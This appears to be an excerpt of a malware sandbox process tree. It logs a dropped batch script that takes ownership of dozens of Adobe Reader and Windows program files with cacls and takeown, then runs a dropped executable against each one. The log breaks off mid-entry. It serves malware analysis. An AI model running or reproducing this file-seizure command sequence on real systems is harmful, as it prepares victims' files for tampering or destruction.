C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\MyriadCAD.otf"3⤵PID:1284
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MyriadCAD.otf" -nobanner3⤵
- Loads dropped DLL
PID:1376 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MyriadCAD.otf" -nobanner4⤵
- Executes dropped EXE
PID:1668
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1756
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif""2⤵
- Loads dropped DLL
PID:820 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif" /E /G Admin:F /C3⤵PID:1052
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif"3⤵PID:1876
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "add_reviewer.gif" -nobanner3⤵
- Loads dropped DLL
PID:968 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "add_reviewer.gif" -nobanner4⤵
- Executes dropped EXE
PID:240
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1392
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif""2⤵
- Loads dropped DLL
PID:900 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif" /E /G Admin:F /C3⤵PID:1076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\ended_review_or_form.gif"3⤵
- Modifies file permissions
PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ended_review_or_form.gif" -nobanner3⤵
- Loads dropped DLL
PID:1956 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ended_review_or_form.gif" -nobanner4⤵
- Executes dropped EXE
PID:1008
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1276
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css""2⤵
- Loads dropped DLL
PID:1836 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css" /E /G Admin:F /C3⤵PID:1472
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\main.css"3⤵PID:1668
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "main.css" -nobanner3⤵
- Loads dropped DLL
PID:1676 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "main.css" -nobanner4⤵
- Executes dropped EXE
PID:1756
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets""2⤵
- Loads dropped DLL
PID:316 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets" /E /G Admin:F /C3⤵PID:1068
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1372
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner3⤵
- Loads dropped DLL
PID:1148 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Workflow.VisualBasic.Targets" -nobanner4⤵
- Executes dropped EXE
PID:904
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1956
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif""2⤵
- Loads dropped DLL
PID:1276 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif" /E /G Admin:F /C3⤵PID:1744
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif"3⤵PID:1472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "review_browser.gif" -nobanner3⤵
- Loads dropped DLL
PID:1668 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "review_browser.gif" -nobanner4⤵
- Executes dropped EXE
PID:1756
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""2⤵
- Loads dropped DLL
PID:1836 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C3⤵PID:240
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"3⤵PID:1068
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "server_ok.gif" -nobanner3⤵
- Loads dropped DLL
PID:1076 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "server_ok.gif" -nobanner4⤵
- Executes dropped EXE
PID:1212
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:532
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif""2⤵
- Loads dropped DLL
PID:616 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif" /E /G Admin:F /C3⤵PID:316
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif"3⤵PID:1516
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "turnOffNotificationInTray.gif" -nobanner3⤵
- Loads dropped DLL
PID:1872 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "turnOffNotificationInTray.gif" -nobanner4⤵
- Executes dropped EXE
PID:568
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:888
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""2⤵
- Loads dropped DLL
PID:1808 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C3⤵PID:820
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"3⤵PID:1036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "AdobePiStd.otf" -nobanner3⤵
- Loads dropped DLL
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "AdobePiStd.otf" -nobanner4⤵
- Executes dropped EXE
PID:828
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1480
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf""2⤵
- Loads dropped DLL
PID:1836 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf"3⤵PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "MinionPro-It.otf" -nobanner3⤵
- Loads dropped DLL
PID:1472 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "MinionPro-It.otf" -nobanner4⤵
- Executes dropped EXE
PID:948
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1052
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""2⤵
- Loads dropped DLL
PID:616 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C3⤵PID:1816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"3⤵PID:1036
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "zx______.pfm" -nobanner3⤵
- Loads dropped DLL
PID:1372 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "zx______.pfm" -nobanner4⤵
- Executes dropped EXE
PID:1688
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1464
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt""2⤵
- Loads dropped DLL
PID:1040 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt" /E /G Admin:F /C3⤵PID:1376
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB.txt"3⤵PID:1092
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner3⤵
- Loads dropped DLL
PID:1152 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "DisplayLanguageNames.en_GB.txt" -nobanner4⤵
- Executes dropped EXE
PID:1676
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1548
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx""2⤵
- Loads dropped DLL
PID:320 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx" /E /G Admin:F /C3⤵PID:792
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt32.clx"3⤵PID:796
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "brt32.clx" -nobanner3⤵
- Loads dropped DLL
PID:1792 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "brt32.clx" -nobanner4⤵
- Executes dropped EXE
PID:1068
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:828
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp""2⤵
- Loads dropped DLL
PID:1688 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp" /E /G Admin:F /C3⤵PID:1464
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng.hyp"3⤵
- Modifies file permissions
PID:896
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "eng.hyp" -nobanner3⤵
- Loads dropped DLL
PID:1800 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "eng.hyp" -nobanner4⤵
- Executes dropped EXE
PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:568
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""2⤵
- Loads dropped DLL
PID:1152 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C3⤵PID:1076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"3⤵PID:1112
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner3⤵
- Loads dropped DLL
PID:1836 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner4⤵
- Executes dropped EXE
PID:792
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:968
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT""2⤵
- Loads dropped DLL
PID:1792 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT" /E /G Admin:F /C3⤵PID:1972
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CYRILLIC.TXT"3⤵
- Modifies file permissions
PID:1276
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CYRILLIC.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2032 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CYRILLIC.TXT" -nobanner4⤵
- Executes dropped EXE
PID:240
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:1348
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""2⤵
- Loads dropped DLL
PID:1800 -
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C3⤵PID:568
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"3⤵PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "UKRAINE.TXT" -nobanner3⤵
- Loads dropped DLL
PID:2008 -
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "UKRAINE.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1144
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵
- Executes dropped EXE
PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT""2⤵PID:1836
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT" /E /G Admin:F /C3⤵PID:532
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1258.TXT"3⤵PID:1980
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "CP1258.TXT" -nobanner3⤵PID:1052
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "CP1258.TXT" -nobanner4⤵
- Executes dropped EXE
PID:1972
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:928
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets""2⤵PID:616
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets" /E /G Admin:F /C3⤵PID:1120
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.Targets"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:904
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Workflow.Targets" -nobanner3⤵PID:1688
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Workflow.Targets" -nobanner4⤵PID:1560
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:208
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui""2⤵PID:228
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui" /E /G Admin:F /C3⤵PID:1076
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\en-US\JNTFiltr.dll.mui"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:972
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "JNTFiltr.dll.mui" -nobanner3⤵PID:796
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "JNTFiltr.dll.mui" -nobanner4⤵PID:1800
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1152
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Journal.exe""2⤵PID:1944
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Journal.exe" /E /G Admin:F /C3⤵PID:1276
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Journal.exe"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:320
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Journal.exe" -nobanner3⤵PID:1464
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Journal.exe" -nobanner4⤵PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Journal\Templates\Memo.jtp""2⤵PID:1120
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Journal\Templates\Memo.jtp" /E /G Admin:F /C3⤵PID:1872
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Journal\Templates\Memo.jtp"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1560
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "Memo.jtp" -nobanner3⤵PID:216
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "Memo.jtp" -nobanner4⤵PID:1348
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:2008
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""2⤵PID:792
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C3⤵PID:1800
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"3⤵
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:472
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "WinMail.exe.mui" -nobanner3⤵PID:232
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "WinMail.exe.mui" -nobanner4⤵PID:1740
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1972
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe""2⤵PID:1052
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe" /E /G Admin:F /C3⤵PID:968
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files\Windows Photo Viewer\ImagingDevices.exe"3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1792
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "ImagingDevices.exe" -nobanner3⤵PID:1980
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "ImagingDevices.exe" -nobanner4⤵PID:712
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1976
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini""2⤵PID:1480
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini" /E /G Admin:F /C3⤵PID:1348
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AGMGPUOptIn.ini"3⤵
- Modifies file permissions
PID:1144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "AGMGPUOptIn.ini" -nobanner3⤵PID:940
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "AGMGPUOptIn.ini" -nobanner4⤵PID:1120
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:796
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html""2⤵PID:608
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html" /E /G Admin:F /C3⤵PID:1624
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\license.html"3⤵
- Modifies file permissions
PID:776
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "license.html" -nobanner3⤵PID:1068
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "license.html" -nobanner4⤵PID:968
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1500
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer""2⤵PID:1688
-
C:\Windows\SysWOW64\cacls.execacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer" /E /G Admin:F /C3⤵PID:1816
-
-
C:\Windows\SysWOW64\takeown.exetakeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\pmd.cer"3⤵PID:1744
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c V779npJ7.exe -accepteula "pmd.cer" -nobanner3⤵PID:224
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula "pmd.cer" -nobanner4⤵PID:2008
-
-
-
C:\Users\Admin\AppData\Local\Temp\V779npJ7.exeV779npJ7.exe -accepteula -c Run -y -p extract -nobanner3⤵PID:1176
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YNPANGml.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\create_form.gif""2⤵PID:1800
-
